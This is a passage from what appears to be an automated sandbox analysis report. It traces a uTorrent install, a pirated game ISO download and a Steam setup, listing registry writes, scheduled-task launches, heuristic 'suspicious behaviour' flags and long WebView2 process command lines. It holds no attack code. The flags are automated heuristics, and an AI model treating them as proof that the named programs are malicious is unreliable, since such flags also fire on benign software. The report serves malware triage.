3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\the-longing-codex_m4vY1NvSZ8.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\The.Longing-CODEX\codex-the.longing.iso:Zone.Identifier | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\SteamSetup.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-ON11E.tmp\setup.tmp | N/A |
| N/A | N/A | F:\Games\The Longing\The Longing.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | F:\Games\The Longing\The Longing.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\SteamSetup.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Steam\bin\steamservice.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe
"C:\Users\Admin\AppData\Local\Temp\utorrent_installer.exe"
C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe
"C:\Users\Admin\AppData\Local\Temp\nsr707E.tmp\utorrent.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}
C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
uTorrent.exe /NOINSTALL /BRINGTOFRONT
C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB62E8_1570869978 µTorrent4823DF041B09 uTorrent ce unp
C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB5948_408977520 µTorrent4823DF041B09 uTorrent ce unp
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=1408.5068.16614229064555360265
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB6080_1125046369 µTorrent4823DF041B09 uTorrent ce unp
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=1984.4748.5186240804764680059
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1a8,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3152.3928.2209418904843276179
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe4,0x1bc,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe
"C:\Users\Admin\AppData\Roaming\uTorrent\updates\3.6.0_47142\utorrentie.exe" uTorrent_2008_03CB62E8_1863064785 µTorrent4823DF041B09 uTorrent ce unp
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=utorrentie.exe --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=msEnhancedTrackingPreventionEnabled --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=4508.2444.15427354753745200292
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1b4,0x7fffcb093cb8,0x7fffcb093cc8,0x7fffcb093cd8
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1896,14695144487908411897,14174798435327063996,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,14695144487908411897,14174798435327063996,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1972 /prefetch:3
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1908,16530629815567354284,17614778898650241542,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,16530629815567354284,17614778898650241542,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=1968 /prefetch:3
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2052 /prefetch:3
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" --webview-exe-name=utorrentie.exe --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1860,12469116650817951988,14240505516930928696,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnhancedTrackingPreventionEnabled,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\LocalLow\uTorrent.WebView2\EBWebView" 